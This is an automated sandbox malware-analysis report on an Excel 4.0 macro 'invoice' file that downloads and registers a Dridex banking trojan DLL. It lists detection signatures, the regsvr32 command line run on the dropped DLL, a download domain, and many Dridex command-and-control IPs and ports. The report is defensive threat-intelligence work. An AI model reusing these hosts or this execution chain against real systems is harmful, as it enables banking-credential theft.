Play interactive tour

Edit tour

Analysis Report Inv0209966048-20210111075675.xls

Overview

General Information

Sample Name:	Inv0209966048-20210111075675.xls
Analysis ID:	338362
MD5:	91baa6aad9201c0ccf3553a5b49eb967
SHA1:	9c182826d5dc041970f31a8d584580f870c3996c
SHA256:	01af3b5c1e2ed68272f542233aece70269a9e977815347a4b9c86bb2d97c086e
Tags:	Dridexxls
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Dridex e-Banking trojan

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: BlueMashroom DLL Load

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Document contains an embedded VBA macro which may execute processes

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Machine Learning detection for dropped file

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Regsvr32 Anomaly

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query network adapater information

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Drops PE files

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains sections with non-standard names

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the installation date of Windows

Registers a DLL

Uses code obfuscation techniques (call, push, ret)

Yara detected Xls With Macro 4.0

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2028 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

regsvr32.exe (PID: 2356 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2328 cmdline: -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)

DW20.EXE (PID: 3052 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1488 MD5: 45A078B2967E0797360A2D4434C41DB4)

DWWIN.EXE (PID: 2968 cmdline: C:\Windows\system32\dwwin.exe -x -s 1488 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)

cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Inv0209966048-20210111075675.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2028, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., ProcessId: 2356

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2028, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll., ProcessId: 2356

Sigma detected: Regsvr32 Anomaly

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.regsvr32.exe.590000.1.raw.unpack

Malware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Inv0209966048-20210111075675.xls	Virustotal: Detection: 45%	Perma Link
Source: Inv0209966048-20210111075675.xls	Metadefender: Detection: 16%	Perma Link
Source: Inv0209966048-20210111075675.xls	ReversingLabs: Detection: 34%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\lwjmdgav.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\w80l82r[1].zip	Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.27.153.52:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49212 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49220 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49224 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49238 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49242 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49246 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49250 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49254 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49258 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49262 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49266 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49270 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49282 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49290 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49294 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49298 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49310 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49314 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49326 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49330 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49334 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49338 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49342 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49346 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49350 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49354 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49358 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49366 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49370 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49374 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49378 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49386 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49390 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49398 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49402 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49406 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49410 version: TLS 1.2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_008BCEF8 FindFirstFileExW,

4_2_008BCEF8

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\lwjmdgav.dll

Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: w80l82r[1].zip.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Jump to behavior

Source: global traffic

DNS query: name: education.scrollx.in

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 104.27.153.52:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 104.27.153.52:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49166
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49168
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49169
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49169
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49171
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49172
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49175
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49176
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49177
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49177
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49179
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49180
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49181
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49181
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49183
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49184
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49185
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49185
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49187
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49188
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49189
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49189
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49191
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49192
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49193
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49193
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49195
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49196
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49197
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49197
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49199
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49200
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49201
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49201
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49203
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49204
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49205
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49205
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49207
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49208
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49209
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49209
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49210
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49210
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49212
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49213
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49214
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49214
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49216
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49217
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49218
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49218
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49220
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49221
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49222
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49222
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49224
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49225
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49226
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49226
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49228
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49229
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49230
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49230
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49233
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49234
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49236
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49236
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49238
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49239
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49240
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49240
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49242
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49243
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49244
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49244
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49246
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49247
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49248
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49248
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49250
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49251
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49252
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49252
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49254
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49255
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49256
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49256
